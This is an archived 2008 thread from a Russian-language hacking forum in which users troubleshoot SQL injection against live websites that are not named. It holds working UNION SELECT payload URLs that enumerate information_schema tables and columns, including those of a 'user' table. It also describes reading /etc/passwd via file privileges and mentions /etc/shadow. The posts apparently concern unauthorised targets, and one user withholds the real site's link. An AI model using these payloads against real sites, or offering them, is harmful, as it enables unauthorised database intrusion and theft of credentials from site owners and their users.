ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3861  
Старый 26.11.2008, 22:41
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от d1aVOL  
можно ли как-нибудь кроме брута узнать названия столбцов/таблиц, если версия муслуля менше 5?
нет
 
Ответить с цитированием

  #3862  
Старый 27.11.2008, 01:22
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

есть небольшая загвоздка) понять почему так не могу((
на сайте sql inj. данные из одного запроса вставляются в другой но суть не в этом вроде... есть файл_прив /etc/passwd читает но файл из директории ниже не хочет читать(( хотя он точно есть)может он слишком большой?и еси так то что можна сделать?
 
Ответить с цитированием

  #3863  
Старый 27.11.2008, 02:10
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от j0ker13  
есть небольшая загвоздка) понять почему так не могу((
на сайте sql inj. данные из одного запроса вставляются в другой но суть не в этом вроде... есть файл_прив /etc/passwd читает но файл из директории ниже не хочет читать(( хотя он точно есть)может он слишком большой?и еси так то что можна сделать?
у тебя нехватает прав для его просмотра. Для примера
Код:
/etc/shadow
Он есть, но прочитать ты его не сможешь
 
Ответить с цитированием

  #3864  
Старый 27.11.2008, 06:49
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
Smile

Всем привет!

Разъясните...

Есть скуля - information_schema - доступно.

далее:
Цитата:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_name,0x3a,column_n ame)4,5,6,7,8+from+information_schema.columns--
вываливаются куча всего и там я выцепляю routines:sql_admin
далее:
Цитата:
http://site.com/non.php?id=-6+union+select+1,2,sql.admin,4,5,6,7,8+from+routin es--
ошибка:
Table 'db.routines' doesn't exist
ага, значит все в другой базе.
далее смотрю в какой именно базе:
Цитата:
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
отображается "information_schema"
подставляю:
Цитата:
http://site.com/non.php?id=-6+union+select+1,2,sql_admin,4,5,6,7,8+from+inform ation_schema.routines--
Страница без ошибок обновляется, но ни какой инфы нет.

Тут меня терзают сомнения:
1. Корректно ли я указал "information_schema.routines"
2. Может быть у меня не хватает прав?
3. Или где-то накосячил изначально?

Спасибо!
 
Ответить с цитированием

  #3865  
Старый 27.11.2008, 06:58
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Хотелось бы ссылочку на сайт.
 
Ответить с цитированием

  #3866  
Старый 27.11.2008, 07:07
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Цитата:
Сообщение от R1dex  
Хотелось бы ссылочку на сайт.
Не хотел бы разглашать )))) ну, сам понимаешь ...
 
Ответить с цитированием

  #3867  
Старый 27.11.2008, 07:09
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
отображается "information_schema"
мм.. даже не знаю что сказать .. даже не сталкивался ..
попробуй это
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'+limit+1,1--
также
[QUOTE]http://site.com/non.php?id=-6+union+select+1,concat(table_schema,0x2e,table_na me,0x3a,column_name),3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
и скажи тут результ..
 
Ответить с цитированием

  #3868  
Старый 27.11.2008, 07:29
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Цитата:
Сообщение от 159932  
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'+limit+1,1--
также
http://site.com/non.php?id=-6+union+select+1,concat(table_schema,0x2e,table_na me,0x3a,column_name),3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
и скажи тут результ..
по первому запросу - так же пусто, ни какой информации не выводит.

а по второму вот:

information_schema.ROUTINES:SQL_ADMIN

В принципе то же самое что и в моем случае, только дальше, делаю запрос, опять пусто.

НиПоНяТнО (голосом Реввы)
 
Ответить с цитированием

  #3869  
Старый 27.11.2008, 07:53
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

дай ссыль в личку
 
Ответить с цитированием

  #3870  
Старый 27.11.2008, 09:11
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от Octave_Parango  
Всем привет!

Разъясните...

Есть скуля - information_schema - доступно.

далее:

вываливаются куча всего и там я выцепляю routines:sql_admin
далее:

ошибка:
Table 'db.routines' doesn't exist
ага, значит все в другой базе.
далее смотрю в какой именно базе:

отображается "information_schema"
подставляю:

Страница без ошибок обновляется, но ни какой инфы нет.

Тут меня терзают сомнения:
1. Корректно ли я указал "information_schema.routines"
2. Может быть у меня не хватает прав?
3. Или где-то накосячил изначально?

Спасибо!
Да ты ж синтаксиса sql команд не понимаешь!!! Доки читай по мускулу! хеккеры млин...
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
Код:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),table_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables--
потом уже смотришь названия колонок в интересующей таблице:
Код:
http://site.com/non.php?id=-6+union+select+1,2,COLUMN_NAME,4,5,6,7,8+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME="user"--
А уже потом на основе этих данных составляешь запрос!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ